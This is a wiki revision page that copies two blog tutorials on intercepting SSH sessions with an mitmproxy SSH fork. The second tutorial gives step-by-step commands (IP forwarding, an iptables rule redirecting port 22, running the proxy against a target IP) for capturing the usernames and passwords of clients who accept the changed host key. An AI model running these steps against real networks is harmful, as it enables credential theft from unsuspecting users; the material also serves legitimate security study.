Difference between revisions of "MITM: mitm ssh"
Onnowpurbo (talk | contribs) (Created page with "sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ Quick and Easy SSH MITM Published: Thu 13 March 2014 By Andrew Smith In Blog. tags: ssh mitm A q...") |
Onnowpurbo (talk | contribs) |
||
| Line 1: | Line 1: | ||
| − | sumber: | + | sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html |
| Line 42: | Line 42: | ||
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh. | And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh. | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
| + | *** setup information | ||
| + | -diagram | ||
| + | client --> mitmproxy --> ssh server | ||
| + | |||
| + | - target server ip: 192.168.202.124 | ||
| + | |||
| + | |||
| + | 1- install dependency packages | ||
| + | $ sudo pip install twisted | ||
| + | $ sudo apt-get install python-service-identity | ||
| + | $ pip install pycrypto | ||
| + | |||
| + | 2- download the mitmproxy | ||
| + | $ git clone https://github.com/saironiq/mitmproxy.git | ||
| + | |||
| + | 3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so | ||
| + | - modify file mitmproxy/mitmproxy/sshdebug.py | ||
| + | -- line 655 modify it to below | ||
| + | mpints.append(cnumber.bytes_to_long( | ||
| + | -- line 11 add the following line | ||
| + | from Crypto.Util import number as cnumber | ||
| + | |||
| + | 4- generate keys | ||
| + | $ cd mitmproxy | ||
| + | $ sudo ./mitmproxy | ||
| + | |||
| + | 5- update ip_forward rule and nat | ||
| + | $ sudo sysctl -w net.ipv4.ip_forward=1 | ||
| + | $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222 | ||
| + | |||
| + | 6- run the mitmproxy_ssh and point to target server 192.168.202.124 | ||
| + | $ sudo ./mitmproxy_ssh -H 192.168.202.124 -s | ||
| + | |||
| + | 7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client | ||
| + | |||
| + | - snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124 | ||
| Line 49: | Line 92: | ||
* https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ | * https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ | ||
| + | * http://www.atechnote.com/2016/10/intercept-username-and-password-using.html | ||
Revision as of 04:08, 5 April 2017
sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html
Quick and Easy SSH MITM
Published: Thu 13 March 2014
By Andrew Smith
In Blog.
tags: ssh mitm
A quick intro to using mitmproxy to man-in-the-middle an SSH connection.
So you want to sniff an SSH connection (that you have access to) but wireshark is giving you junk? Luckily someone has written a tool for that. The mitmproxy by Maximilian Hils allows you to plop a fake server in between your SSH client and the SSH server you're connecting to.
I wanted to have a nose at the data sent from git to github over SSH. This is what I did.
- Download mitmproxy
git clone https://github.com/mitmproxy/mitmproxy.git
- Generate mitm keys (these go to ~/.mitmkeys)
./mitmkeys
Now you want to install the SSH key you just generated to the server you want to mitm.
- Install SSH key
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
Then run the proxy, pointing it at the victimserver.
- Run proxy
./mitmproxy_ssh -H victimserver
This runs the proxy on localhost:2222
Now simply connect to the local proxy:
ssh localhost -p 2222
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
- setup information
-diagram client --> mitmproxy --> ssh server
- target server ip: 192.168.202.124
1- install dependency packages
$ sudo pip install twisted
$ sudo apt-get install python-service-identity
$ pip install pycrypto
2- download the mitmproxy $ git clone https://github.com/saironiq/mitmproxy.git
3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so - modify file mitmproxy/mitmproxy/sshdebug.py
-- line 655 modify it to below
mpints.append(cnumber.bytes_to_long(
-- line 11 add the following line
from Crypto.Util import number as cnumber
4- generate keys $ cd mitmproxy $ sudo ./mitmproxy
5- update ip_forward rule and nat $ sudo sysctl -w net.ipv4.ip_forward=1 $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
6- run the mitmproxy_ssh and point to target server 192.168.202.124 $ sudo ./mitmproxy_ssh -H 192.168.202.124 -s
7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client
- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124